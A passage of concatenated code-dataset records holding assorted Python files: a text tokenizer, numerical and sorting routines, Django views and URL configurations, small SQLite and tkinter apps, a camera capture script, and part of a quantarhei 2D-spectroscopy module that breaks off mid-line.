tokens)\n\t\ttokens.append('^_^')\n\t\treturn True\n\n\tif re.fullmatch('[a-zа-яё]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('.*?\\)+0+[)0]*', token):\n\t\tprocess_token(re.sub('\\)+0+[)0]*$', '', token), tokens)\n\t\ttokens.append('))0')\n\t\treturn True\n\tif re.fullmatch('.*?\\(+9+[(9]*', token):\n\t\tprocess_token(re.sub('\\(+9+[(9]*$', '', token), tokens)\n\t\ttokens.append('((9')\n\t\treturn True\n\tif re.fullmatch('.*?!*1+[!1]+', token):\n\t\tprocess_token(re.sub('!*1+[!1]+$', '', token), tokens)\n\t\ttokens.append('!!11')\n\t\treturn True\n\tif re.fullmatch('.*?([a-zа-яё])1{3,}', token):\n\t\tprocess_token(re.sub('1{3,}$', '', token), tokens)\n\t\ttokens.append('111')\n\t\treturn True\n\tif re.fullmatch('.*?((\\?+)?(!+\\?+)+)', token):\n\t\tprocess_token(re.sub('(\\?+)?(!+\\?+)+$', '', token), tokens)\n\t\ttokens.append('!?')\n\t\treturn True\n\n\tif re.fullmatch('[a-zа-яё0-9]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.search('-+>+', token):\n\t\tsts = re.split('-+>+', token)\n\t\tfor i, st in enumerate(sts):\n\t\t\tprocess_token(st, tokens)\n\t\t\tif i < len(sts) - 1:\n\t\t\t\ttokens.append('->')\n\t\treturn True\n\n\ttoken = re.sub('-{2,}', '–', token)\n\n\tfor char in ['.', ',', '!', '?', '(', ')', '-', '_', '+']:\n\t\tif re.fullmatch('.*?' + re.escape(char) + '{2,}', token):\n\t\t\tprocess_token(re.sub(re.escape(char) + '{2,}$', '', token), tokens)\n\t\t\ttokens.append(char * 3)\n\t\t\treturn True\n\tfor char in ['.', ',', '!', '?', '(', ')', '-', '_', '+']:\n\t\tif re.fullmatch(re.escape(char) + '{2,}.*?', token):\n\t\t\ttokens.append(char * 3)\n\t\t\treturn process_token(re.sub('^' + re.escape(char) + '{2,}', '', token), tokens)\n\n\tfor char in ['.', ',', '!', '?', ':', ';', '-', '–', '*', '=', '~', '$']:\n\t\tif re.fullmatch('.*?' 
+ re.escape(char), token):\n\t\t\tprocess_token(re.sub(re.escape(char) + '$', '', token), tokens)\n\t\t\ttokens.append(char)\n\t\t\treturn True\n\tfor char in ['.', ',', '!', '?', ':', ';', '-', '–', '*', '=', '~', '$']:\n\t\tif re.fullmatch(re.escape(char) + '.*', token):\n\t\t\ttokens.append(char)\n\t\t\treturn process_token(re.sub('^' + re.escape(char), '', token), tokens)\n\n\tfor char in ['.', ',', '!', '?', ':', ';', '+', '*', '=', '–']:\n\t\tif re.search(re.escape(char), token):\n\t\t\tsts = re.split(re.escape(char), token)\n\t\t\tfor i, st in enumerate(sts):\n\t\t\t\tif process_token(st, tokens) and i < len(sts) - 1:\n\t\t\t\t\ttokens.append(char)\n\t\t\treturn True\n\n\tif re.search('[a-zа-яё$]+/[a-zа-яё]+', token):\n\t\tsts = token.split('/')\n\t\tfor i, st in enumerate(sts):\n\t\t\tif process_token(st, tokens) and i < len(sts) - 1:\n\t\t\t\ttokens.append('/')\n\t\treturn True\n\n\tif re.fullmatch('[(\\[\\]][a-zа-яё0-9].*', token):\n\t\treturn process_token(re.sub('^[(\\[\\]]', '', token), tokens)\n\tif re.fullmatch('.*?[a-zа-яё0-9][)\\[\\]]', token):\n\t\treturn process_token(re.sub('[)\\[\\]]$', '', token), tokens)\n\n\tif re.search('[()]', token):\n\t\tfor st in re.split('[()]', token):\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\tif re.search('[.,!?;]-', token):\n\t\tsts = re.sub('([a-zа-яё0-9])([.,!?;])-([a-zа-яё0-9])', '\\\\1 \\\\2 - \\\\3', token).split(' ')\n\t\tfor st in sts:\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\ttokens.append(token)\n\treturn True\n","sub_path":"parse_utils.py","file_name":"parse_utils.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"520330148","text":"import numpy as np\nimport scipy.linalg as sla\n\n\n\n\ndef normaInfinito(v):\n maxv: float\n maxv = v[0]\n for i in range(0, len(v)):\n if abs(v[i]) >= maxv:\n maxv = abs(v[i])\n return maxv\n\n\ndef normalizarVector(v):\n w = [0]*len(v)\n for i in range(0, len(v)):\n w[i] = v[i] / normaInfinito(v)\n return w\n\n\n\ndef maxNoZero(v):\n return max([x for x in v if x !=0])\n\n\n\ndef productoMatrizVector(m, v):\n rows = len(m)\n w = [0]*rows\n suma = 0\n for j in range(rows):\n mi = m[j]\n for i in range(len(v)):\n suma += mi[i]*v[i]\n w[j], suma = suma, 0\n\n return w\n\n\n\n\n\n\ndef metodoPotenciasInverso(A, x, M,):\n y = []\n r = 0\n r0: float\n i: int\n (P, L, U) = sla.lu(A)\n UInversa = sla.inv(U)\n LInversa = sla.inv(L)\n for i in range(0, M):\n\n print(i, \":\")\n print(\"r =\", r)\n print(\"x =\", np.around(x, 5))\n r0 = x[0]\n x = productoMatrizVector(UInversa, productoMatrizVector(LInversa, x))\n r = x[0]/r0\n x = normalizarVector(x)\n\nmetodoPotenciasInverso([[6, 5, -5],\n [2, 6, -2],\n [2, 5, -1]], [3, 7, -13], 12)\n\n\n\n\n\n\n","sub_path":"Problema5/potenciasInverso.py","file_name":"potenciasInverso.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49952420","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\pyrrd\\meta.py\n# Compiled at: 2014-01-14 03:50:33\ndisplay_name = 'pyrrd-fix'\nlibrary_name = 'pyrrd'\nversion = '0.1.1'\nauthor = 'Duncan McGreggor'\nauthor_email = 'duncan@canonical.com'\nlicense = 'BSD'\nurl = 'http://code.google.com/p/pyrrd/'\ndescription = 'bug fixed for 
pyrrd'","sub_path":"pycfiles/pyRRG-0.1.2.tar/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"412176912","text":"# import mysql.connector\nimport os\nimport sqlite3\n\n\n\nconn = sqlite3.connect(\"resep.db\")\ncursor = conn.cursor()\n# cur.execute(\"CREATE TABLE IF NOT EXISTS profile(id INTEGER PRIMARY KEY, First TEXT, Surname TEXT)\")\ncursor.execute('''CREATE TABLE IF NOT EXISTS resep (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n namaResep VARCHAR NOT NULL,\n bahan VARCHAR NOT NULL\n )''')\nconn.commit()\n# conn.close()\n\n#\n# db = mysql.connector.connect(\n# host=\"localhost\",\n# user=\"admin\",\n# passwd=\"admin\",\n# database=\"toko_mainan\"\n# )\n\n\ndef insert_data():\n namaResep = input(\"Masukan nama resep: \")\n bahan = input(\"Masukan bahan: \")\n # cursor = db.cursor()\n cursor.execute(\"INSERT INTO resep (namaResep, bahan) VALUES (?, ?)\",(namaResep, bahan))\n conn.commit()\n print(\"{} data berhasil disimpan\".format(cursor.rowcount))\n\n\ndef show_data():\n # cursor = db.cursor()\n sql = \"SELECT * FROM resep\"\n cursor.execute(sql)\n results = cursor.fetchall()\n \n # if cursor.rowcount < 0:\n # print(\"Tidak ada data\")\n # else:\n print(\"Nama Resep\")\n for data in results:\n print(data[1])\n\n\ndef update_data(db):\n show_data()\n customer_id = input(\"pilih id customer> \")\n name = input(\"Nama baru: \")\n address = input(\"Alamat baru: \")\n\n sql = \"UPDATE customers SET name=%s, address=%s WHERE customer_id=%s\"\n val = (name, address, customer_id)\n cursor.execute(sql, val)\n db.commit()\n print(\"{} data berhasil diubah\".format(cursor.rowcount))\n\n\n# def delete_data(db):\n# cursor = db.cursor()\n# show_data(db)\n# customer_id = input(\"pilih id customer> \")\n# sql = \"DELETE FROM customers WHERE customer_id=%s\"\n# val = (customer_id,)\n# cursor.execute(sql, val)\n# db.commit()\n# print(\"{} data berhasil dihapus\".format(cursor.rowcount))\n#\n#\n# def search_data(db):\n# cursor = db.cursor()\n# keyword = input(\"Kata kunci: \")\n# sql = \"SELECT * FROM customers WHERE name LIKE %s OR address LIKE %s\"\n# val = (\"%{}%\".format(keyword), \"%{}%\".format(keyword))\n# cursor.execute(sql, val)\n# results = cursor.fetchall()\n#\n# if cursor.rowcount < 0:\n# print(\"Tidak ada data\")\n# else:\n# for data in results:\n# print(data)\n#\n\ndef show_menu():\n print(\"=== APLIKASI DATABASE PYTHON ===\")\n print(\"1. Insert Data\")\n print(\"2. Tampilkan Data\")\n print(\"3. Update Data\")\n print(\"4. Hapus Data\")\n print(\"5. Cari Data\")\n print(\"0. 
Keluar\")\n print(\"------------------\")\n menu = input(\"Pilih menu> \")\n\n #clear screen\n # os.system(\"clear\")\n\n if menu == \"1\":\n insert_data()\n elif menu == \"2\":\n show_data()\n # elif menu == \"3\":\n # update_data()\n # elif menu == \"4\":\n # delete_data()\n # elif menu == \"5\":\n # search_data()\n elif menu == \"0\":\n exit()\n else:\n print(\"Menu salah!\")\n\n\nif __name__ == \"__main__\":\n while(True):\n show_menu()\n","sub_path":"cruds_app.py","file_name":"cruds_app.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652376408","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom olistconnect.models import *\n\nfrom olistconnect.serializers import * \n\nfrom django.views.generic import ListView\n\nfrom rest_framework.views import *\n\n# Create your views here.\n\ndef index(request):\n\t\n\treturn render(request,'base.html')\n\ndef listChannels(request):\n\n\tchannels = Channel.objects.all()\n\tcontext = {\n\t\t'channels' : channels,\n\t}\n\treturn render(request,\"olistconnect/listChannels.html\",context)\n\ndef listCategories(request, channel_name):\n\n\tchannel = Channel.objects.get(name=channel_name)\n\tchannelCategories = channel.category_set.all()\n\t\n\n\tcontext = {\n\t\t'categories' : channelCategories,\n\t\t'channel' : channel\n\t}\n\treturn render(request,\"olistconnect/listCategories.html\",context)\n\ndef showCategory(request, channel_name, category_detail):\n\n\tcategory = Category.objects.get(slug=category_detail)\n\tchannel = channel_name\n\tidparentCategories = CategoryPath.objects.filter(descendant=category)\n\tparentCategories = []\n\tsubcategories = []\n\tfor path in idparentCategories:\n\t\tparentCategories.append(path.ancestor)\n\tiddescendantCategories = CategoryPath.objects.filter(ancestor=category)\n\tfor path in iddescendantCategories:\n\t\tsubcategories.append(path.descendant)\n\tif (parentCategories[0]==None):\n\t\tparentCategories=None\n\telif ( (subcategories[0].name==category.name) and (len(subcategories)==1) ):\n\t\tsubcategories = None\n\tcontext = {\n\t\t'category': category,\n\t\t'subcategories': subcategories,\n\t\t'parentCategories': parentCategories,\n\t\t'channel': channel\n\t}\n\treturn render(request,\"olistconnect/categoryDetail.html\", context)\n\nclass ListChannels(APIView):\n \"\"\"\n View to list all channels in the system.\n\n \"\"\" \n\n def get(self, request, format=None):\n \"\"\"\n get:\n Return a list of all channels.\n \"\"\"\n channels = Channel.objects.all()\n channelSerialized = channelSerializer(channels,many=True)\n return Response(channelSerialized.data)\n\nclass ListCategories(APIView):\n \"\"\"\n View to list all categories in a Channel.\n\n \"\"\" \n\n def get(self, request, channel_name, format=None):\n \"\"\"\n get:\n Return a list of the Channel Categories.\n \"\"\"\n channel = get_object_or_404(Channel, name=channel_name)\n categories = Category.objects.filter(categoryChannel=channel)\n categorySerialized = categorySerializer(categories,many=True)\n return Response(categorySerialized.data)\n\n \nclass ListParentSubCategories(APIView):\n\n\t\"\"\"\n\tView to list the Parent Categories and Subcategories of a Particular Category\n\n\t\"\"\"\n\n\tdef get(self, request, channel_name, category_slug, format=None):\n\t\t\"\"\"\n Return a list of Parents 
and Sub Categories of a Category\n \"\"\"\n\t\tchannel = get_object_or_404(Channel, name=channel_name)\n\t\tcategory = get_object_or_404(Category, slug=category_slug, categoryChannel=channel )\n\t\tparentCategories = self.getAncestors(category)\n\t\tsubCategories = self.getDescendants(category)\n\n\n\n\n\n\t\tparentSerialized = categorySerializer(parentCategories,many=True)\n\t\tsubSerialized = categorySerializer(subCategories,many=True)\n\n\t\tcontent = {\n\t\t\t'parents': parentSerialized.data,\n\t\t\t'subcategories': subSerialized.data,\n\t\t}\n\n\t\treturn Response(content)\n\n\tdef getAncestors(self,Category):\n\t\t\"\"\"\n Return a list of parent Categories of a Category\n \"\"\"\n\t\tancestors = []\n\t\tidAncestors = CategoryPath.objects.filter(descendant=Category).exclude(ancestor=Category)\n\t\tfor path in idAncestors:\n\t\t\tancestors.append(path.ancestor)\n\n\t\treturn ancestors\n\n\tdef getDescendants(self,Category):\n\t\t\"\"\"\n Return a list of subcategories of a Category\n \"\"\"\n\t\tdescendants = []\n\t\tidDescendants = CategoryPath.objects.filter(ancestor=Category).exclude(descendant=Category)\n\t\tfor path in idDescendants:\n\t\t\tdescendants.append(path.descendant)\n\n\t\treturn descendants\n\n\n\n\n\n\n\n\n\n","sub_path":"work-at-olist/olistconnect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581889570","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.core.mail import EmailMessage\n\nfrom .forms import ContactForm\n\n\ndef contact(request):\n contact_form = ContactForm()\n\n if request.method == 'POST':\n contact_form = ContactForm(data=request.POST)\n if contact_form.is_valid():\n name = request.POST.get('name', '')\n email_address = request.POST.get('email', '')\n content = request.POST.get('content', '')\n # Send the email\n email = EmailMessage(\n 'La Caffetiera: Curso, Proyecto Intermedio',\n 'De {} <{}>\\n\\nEscribio:\\n\\n{}'.format(name, email_address, content),\n 'no-contestar@inbox.mailtrap.io',\n ['davidsanchezmotran@gmail.com'],\n reply_to=[email_address]\n )\n\n try:\n # If it succeeds\n email.send()\n return redirect(reverse('contact') + '?ok')\n except:\n # If it fails\n return redirect(reverse('contact') + '?fail')\n\n return render(request, 'contact/contact.html', {'form': contact_form})\n","sub_path":"webempresa/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42635611","text":"from time import sleep\nfrom datetime import datetime\nfrom sh import gphoto2 as gp\nimport signal\nimport os\nimport subprocess\n\nshot_date = datetime.now().strftime(\"%Y-%m-%d\")\nprint(shot_date) # 2019-05-19\n\n\ndef capture_cmd():\n shot_time = datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n triggerAndDownloadWithName = [\n \"--capture-image-and-download\", \"--filename\", shot_time]\n return triggerAndDownloadWithName\n\n\ndef createSaveFolder(save_location):\n try:\n os.chdir(\"/home/pi/Pictures\")\n print(\"Creating folder to save images: \", save_location)\n os.makedirs(save_location)\n os.chdir(save_location)\n current_directory = os.getcwd()\n print(\"Current Directory: \", current_directory)\n except:\n print(\"failed to create the new directory.\")\n\n\ndef captureImage():\n for x in range(0, 10):\n trigger_cmd = capture_cmd()\n gp(trigger_cmd)\n 
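# short pause between shots; 3 seconds is the author's delay, presumably to give the camera time to finish saving the previous frame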
sleep(3)\n\n\ncreateSaveFolder(shot_date)\ncaptureImage()\n","sub_path":"imageCapture.py","file_name":"imageCapture.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85961061","text":"from py_backup.utils import is_sorted, numbers\n\n\n# class Shell:\n# n = 0\n#\n# @staticmethod\n# def sort(nums):\n# length = len(nums)\n# k = 1\n# while k < length // 3:\n# k = k * 3 + 1\n#\n# while k >= 1:\n# for index in range(k, length): # the step here is 1, not k, so that one full pass leaves the list k-sorted\n# key = nums[index]\n# insert_index = index\n# for inner_index in range(index - k, -1, -k):\n# Shell.n += 1\n# compared_key = nums[inner_index]\n# if key < compared_key:\n# nums[inner_index + k] = compared_key\n# insert_index = inner_index\n# else:\n# break\n# nums[insert_index] = key\n# k = k // 3\n#\n# return nums\n\n\nclass Shell:\n n = 0\n\n @staticmethod\n def sort(nums):\n length = len(nums)\n k = 1\n while k < length // 3:\n k = k * 3 + 1\n\n while k >= 1:\n for outer_index in range(k, length):\n key_index = outer_index\n key = nums[key_index]\n for inner_index in range(outer_index - k, -1, -k):\n compared = nums[inner_index]\n Shell.n += 1\n if key < compared:\n nums[inner_index + k] = compared\n key_index = inner_index\n else:\n break\n nums[key_index] = key\n k = k // 3\n\n return nums\n\nif __name__ == \"__main__\":\n print(numbers)\n\n sorted_numbers = Shell.sort(numbers[:])\n print(sorted_numbers)\n print(is_sorted(numbers, sorted_numbers))\n print(Shell.n)\n","sub_path":"py_backup/sort/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49360186","text":"from tkinter import *\nfrom tkinter import ttk\nfrom main import main\n\nwindow= Tk() # root window that owns every widget in this GUI\n\nwindow.style=ttk.Style()\n\nwindow.title (\"CRC\")\n\nwindow.wm_state('zoomed')\n\nlabel=Label(text='Get Generator input from a text file',font='sans-serif 20 bold'\n ,fg='#666666',pady=30\n)\n\nlabel.grid(column=0, row=0)\nwindow.columnconfigure(0, weight=1)\n\n\n\nbutton=Button (master=window,text='Select File',command=lambda :main(window),bg='#EA5E3D',activebackground='#000000',fg='#FFFFFF',activeforeground='#FFFFFF',font=\"Helvetica 20\",width=30,height=1)\nbutton.grid(column=0,row=1)\n\n\nwindow.mainloop()\n","sub_path":"Code/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642326601","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(\n r'^notifications/(?P<slug>.*)$',\n views.NotificationView.as_view(),\n name='notifications'\n ),\n url(\n r'^post_payment/(?P<slug>.*)$',\n views.PaymentSuccessView.as_view(),\n name='payment_success',\n ),\n url(\n r'^payment_failed/(?P<slug>.*)$',\n views.PaymentFailedView.as_view(),\n name='payment_failure',\n ),\n url(\n r'^payment_pending/(?P<slug>.*)$',\n views.PaymentPendingView.as_view(),\n name='payment_pending',\n ),\n]\n","sub_path":"django_mercadopago/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"251335237","text":"from Sql.Connect import create_connection\nfrom Sql.DbPath import path\nfrom Sql.Exec import execSql\n\ndef update(column, val,title):\n conn = create_connection(path())\n val = val.replace('\\'', '\\'\\'')\n title = title.replace('\\'', '\\'\\'')\n sql_insert = \"\"\"UPDATE MOVIES SET \"\"\"+column+\"\"\"='\"\"\"+val+\"\"\"' WHERE TITLE='\"\"\"+title+ \"\"\"';\"\"\"\n\n print(sql_insert)\n\n\n\n if conn is not None:\n\n execSql(conn, sql_insert)\n else:\n print(\"Error! cannot create the database connection.\")\n\n\ndef trim():\n conn = create_connection(path())\n sql_insert = \"\"\"UPDATE MOVIES SET TITLE = trim(TITLE);\"\"\"\n\n if conn is not None:\n\n execSql(conn, sql_insert)\n else:\n print(\"Error! cannot create the database connection.\")\n\n\n\n","sub_path":"Sql/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622656531","text":"code = \"\"\"\n#include <math.h>\n\nextern \"C\" float add(int a, int b){\n return a + b + M_PI;\n}\n\"\"\"\ntestmodule = {\n \"type\": \"compiled\",\n \"objects\": {\n \"main\": {\n \"code\": code,\n \"language\": \"cpp\",\n },\n },\n \"link_options\" : [\"-lm\"],\n \"public_header\": {\n \"language\": \"c\",\n \"code\": \"float add(int a, int b);\"\n }\n}\n\nfrom seamless.core import context, cell, transformer, macro_mode_on\nwith macro_mode_on():\n ctx = context(toplevel=True)\n ctx.testmodule = cell(\"plain\")\n ctx.testmodule.set(testmodule)\n tf = ctx.tf = transformer({\n \"a\": (\"input\", \"plain\"),\n \"b\": (\"input\", \"plain\"),\n \"testmodule\": (\"input\", \"plain\", \"module\"),\n \"result\": (\"output\", \"plain\"),\n })\n ctx.testmodule.connect(tf.testmodule)\n tf._debug = {\n \"direct_print\" : True\n }\n tf.a.cell().set(2)\n tf.b.cell().set(3)\n tf.code.cell().set(\"\"\"\nfrom .testmodule import lib\nprint(\"ADD\", lib.add(a,b))\nresult = testmodule.lib.add(a,b)\n \"\"\")\n ctx.result = cell(\"plain\")\n ctx.tf.result.connect(ctx.result)\n\nctx.compute()\nprint(ctx.result.value)\n","sub_path":"tests/lowlevel/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"189464758","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy\n\nfrom ..core.time import TimeAxis\nfrom ..builders.aggregates import Aggregate\nfrom ..builders.molecules import Molecule\nfrom ..core.managers import eigenbasis_of\nfrom ..qm.propagators.poppropagator import PopulationPropagator \n\nfrom ..utils import derived_type\n\nimport time\n\nclass DFunction2:\n \"\"\"Discrete two-dimensional function \n \n \"\"\"\n def __init__(self, x=None, y=None, z=None):\n pass\n \n def save(self, filename):\n pass\n \n def load(self, filename):\n pass\n \n def plot(self,**kwargs):\n 
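# stub in the abstract base class; concrete containers such as TwoDSpectrumContainer below provide the real plotting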
pass \n\n\nclass TwoDSpectrumBase(DFunction2):\n \"\"\"Basic container for two-dimensional spectrum\n \n \n \"\"\"\n \n def __init__(self):\n super().__init__()\n self.data = None\n self.xaxis = None\n self.yaxis = None\n \n self.reph2D = None\n self.nonr2D = None\n\n\n def set_axis_1(self, axis):\n self.xaxis = axis\n \n def set_axis_3(self, axis):\n self.yaxis = axis\n \n def set_data(self, data, dtype=\"Tot\"):\n if dtype == \"Tot\":\n self.data = data\n \n elif dtype == \"Reph\":\n \n self.reph2D = data\n \n elif dtype == \"Nonr\":\n \n self.nonr2D = data\n \n else:\n \n raise Exception(\"Unknown type of data: \"+dtype)\n \n def save(self, filename):\n super().save(filename)\n \n def load(self, filename):\n super().load(filename)\n \n \nclass TwoDSpectrumContainer(TwoDSpectrumBase):\n \n def __init__(self):\n super().__init__()\n \n \n def plot(self, axis=None, part=\"ReTot\"):\n \n if part == \"ReTot\":\n # Real part of the total spectrum\n spect2D = numpy.real(self.reph2D) + numpy.real(self.nonr2D)\n \n else:\n raise Exception(\"Undefined part of the spectrum: \"+part)\n \n \n if axis is not None: \n w1_min = axis[0]\n w1_max = axis[1]\n w3_min = axis[2]\n w3_max = axis[3]\n\n (i1_min, dist) = self.xaxis.locate(w1_min)\n (i1_max, dist) = self.xaxis.locate(w1_max)\n\n (i3_min, dist) = self.yaxis.locate(w3_min)\n (i3_max, dist) = self.yaxis.locate(w3_max) \n \n else:\n i1_min = 0\n i1_max = self.xaxis.length\n i3_min = 0\n i3_max = self.yaxis.length\n \n \n #\n # Plotting with given units on axes\n #\n \n realout = spect2D[i1_min:i1_max,i3_min:i3_max]\n \n Ncontour = 100\n plt.contourf(self.xaxis.data[i1_min:i1_max],\n self.yaxis.data[i3_min:i3_max],\n realout, Ncontour) \n \n \n def devide_by(self, val):\n \"\"\"Divides the total spectrum by a value\n \n \"\"\"\n self.reph2D = self.reph2D/val\n self.nonr2D = self.nonr2D/val\n \n \nclass TwoDSpectrumCalculator:\n \"\"\"Calculator of the 2D spectrum\n \n \n Enables setting up parameters of 2D spectrum calculation for later\n evaluation. 
The method `calculate` returns TwoDSpectrumContainer\n with a 2D spectrum.\n \n Parameters\n ----------\n \n \n \"\"\"\n\n t1axis = derived_type(\"t1axis\",TimeAxis)\n t2axis = derived_type(\"t2axis\",TimeAxis)\n t3axis = derived_type(\"t3axis\",TimeAxis)\n \n system = derived_type(\"system\",[Molecule,Aggregate])\n \n def __init__(self, t1axis, t2axis, t3axis,\n system=None,\n dynamics=\"secular\",\n relaxation_tensor=None,\n rate_matrix=None,\n effective_hamiltonian=None):\n self.t1axis = t1axis\n self.t2axis = t2axis\n self.t3axis = t3axis\n \n #FIXME: check the compatibility of the axes \n \n if system is not None:\n self.system = system\n \n #FIXME: properties to be protected\n self.dynamics = dynamics\n \n # unprotected properties\n self.data = None\n \n self._relaxation_tensor = None\n self._rate_matrix = None\n self._relaxation_hamiltonian = None\n self._has_relaxation_tensor = False\n if relaxation_tensor is not None:\n self._relaxation_tensor = relaxation_tensor\n self._has_relaxation_tensor = True\n if effective_hamiltonian is not None:\n self._relaxation_hamiltonian = effective_hamiltonian\n if rate_matrix is not None:\n self._rate_matrix = rate_matrix\n self._has_rate_matrix = True\n \n self._have_aceto = False\n \n def _vprint(self, string):\n \"\"\"Prints a string if the self.verbose attribute is True\n \n \"\"\"\n if self.verbose:\n print(string)\n \n def calculate(self, rwa=0.0, verbose=False):\n \"\"\"Returns 2D spectrum\n \n Calculates and returns TwoDSpectrumContainer containing 2D spectrum\n based on the parameters specified in this object.\n \n \n \"\"\"\n self.verbose = verbose\n \n try:\n \n import aceto.nr3td as nr3td \n from aceto.lab_settings import lab_settings\n from aceto.band_system import band_system \n self._have_aceto = True\n \n except:\n #\n # FIXME: There should be an optional warning and a fall back onto\n # quantarhei.implementations.aceto module\n #\n raise Exception(\"Aceto not available\")\n \n from ..implementations.aceto import nr3td\n \n self._have_aceto = False\n \n \n if self._have_aceto:\n \n # calculate 2D spectrum using aceto library\n\n ###############################################################################\n #\n # Create band_system from quantarhei classes\n #\n ###############################################################################\n \n if isinstance(self.system, Aggregate):\n \n pass\n \n else:\n \n raise Exception(\"Molecule 2D not implememted\")\n \n agg = self.system\n \n #\n # hamiltonian and transition dipole moment operators\n #\n H = agg.get_Hamiltonian()\n D = agg.get_TransitionDipoleMoment()\n \n #\n # Construct band_system object\n #\n Nb = 3\n Ns = numpy.zeros(Nb, dtype=numpy.int)\n Ns[0] = 1\n Ns[1] = agg.nmono\n Ns[2] = Ns[1]*(Ns[1]-1)/2\n sys = band_system(Nb, Ns)\n \n \n #\n # Set energies\n #\n en = numpy.zeros(sys.Ne, dtype=numpy.float64)\n #if True:\n with eigenbasis_of(H):\n for i in range(sys.Ne):\n en[i] = H.data[i,i]\n sys.set_energies(en)\n \n #\n # Set transition dipole moments\n #\n dge_wr = D.data[0:Ns[0],Ns[0]:Ns[0]+Ns[1],:]\n def_wr = D.data[Ns[0]:Ns[0]+Ns[1],\n (Ns[0]+Ns[1]):(Ns[0]+Ns[1]+Ns[2]),:]\n \n dge = numpy.zeros((3,Ns[0],Ns[1]), dtype=numpy.float64)\n deff = numpy.zeros((3,Ns[1],Ns[2]), dtype=numpy.float64)\n \n for i in range(3):\n dge[i,:,:] = dge_wr[:,:,i]\n deff[i,:,:] = def_wr[:,:,i]\n sys.set_dipoles(0,1,dge)\n sys.set_dipoles(1,2,deff)\n \n \n #\n # Relaxation rates\n #\n KK = agg.get_RedfieldRateMatrix()\n \n # relaxation rate in single exciton band\n Kr = 
KK.data[Ns[0]:Ns[0]+Ns[1],Ns[0]:Ns[0]+Ns[1]]*10.0\n #print(1.0/Kr)\n \n sys.init_dephasing_rates()\n sys.set_relaxation_rates(1,Kr)\n \n \n #\n # Lineshape functions\n #\n sbi = agg.get_SystemBathInteraction()\n cfm = sbi.CC\n cfm.create_double_integral()\n \n \n #\n # Transformation matrices\n #\n SS = H.diagonalize()\n SS1 = SS[1:Ns[1]+1,1:Ns[1]+1]\n SS2 = SS[Ns[1]+1:,Ns[1]+1:]\n H.undiagonalize()\n \n sys.set_gofts(cfm._gofts) # line shape functions\n sys.set_sitep(cfm.cpointer) # pointer to sites\n sys.set_transcoef(1,SS1) # matrix of transformation coefficients \n sys.set_transcoef(2,SS2) # matrix of transformation coefficients \n\n #\n # Finding population evolution matrix\n #\n prop = PopulationPropagator(self.t1axis, Kr)\n Uee, Uc0 = prop.get_PropagationMatrix(self.t2axis,\n corrections=True)\n\n\n #\n # define lab settings\n #\n lab = lab_settings(lab_settings.FOUR_WAVE_MIXING)\n X = numpy.array([1.0, 0.0, 0.0], dtype=numpy.float64)\n lab.set_laser_polarizations(X, X, X, X)\n \n #\n # Other parameters\n #\n \n #dt = self.t1axis.step\n t1s = self.t1axis.data \n t3s = self.t3axis.data \n\n Nr1 = self.t1axis.length\n Nr3 = self.t3axis.length\n\n atype = self.t1axis.atype\n self.t1axis.atype = 'complete'\n oa1 = self.t1axis.get_FrequencyAxis() \n oa1.data += rwa\n oa1.start += rwa\n self.t1axis.atype = atype\n \n atype = self.t3axis.atype\n self.t3axis.atype = 'complete'\n oa3 = self.t3axis.get_FrequencyAxis() \n oa3.data += rwa\n oa3.start += rwa\n self.t3axis.atype = atype\n \n tc = 0\n twods = []\n \n teetoos = self.t2axis.data\n for tt2 in teetoos:\n\n #\n # Initialize response storage\n #\n resp_r = numpy.zeros((Nr1, Nr3), \n dtype=numpy.complex128, order='F')\n resp_n = numpy.zeros((Nr1, Nr3), \n dtype=numpy.complex128, order='F')\n\n # FIXME: which on axis we should be looking for it2 ??? \n (it2, err) = 